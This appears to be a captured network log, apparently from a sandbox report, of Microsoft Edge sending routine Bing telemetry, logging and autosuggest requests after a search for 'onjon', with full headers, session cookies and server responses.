cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306930.7f1b50a
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_feedback%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_feedback%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306931.7f1b70d
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_exit%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_exit%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306931.7f1b704
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1107
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306931.7f1b725
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 601
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:52 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306932.7f1bba5
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22mapsOptOut%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22mapsOptOut%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849

Response

HTTP/2.0 200

content-length: 409
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a3676f64ea4954d4cbf17f311f1
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ZS+1UW+0i9e5DXnv4s6JJ4bRpXfqvas4iRHLx82mTBw='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:54 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306934.7f1c529
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306921399%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306921399%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:54 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306934.7f1c5ae
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=onjon&cp=5&csr=1&zis=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=onjon&cp=5&csr=1&zis=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
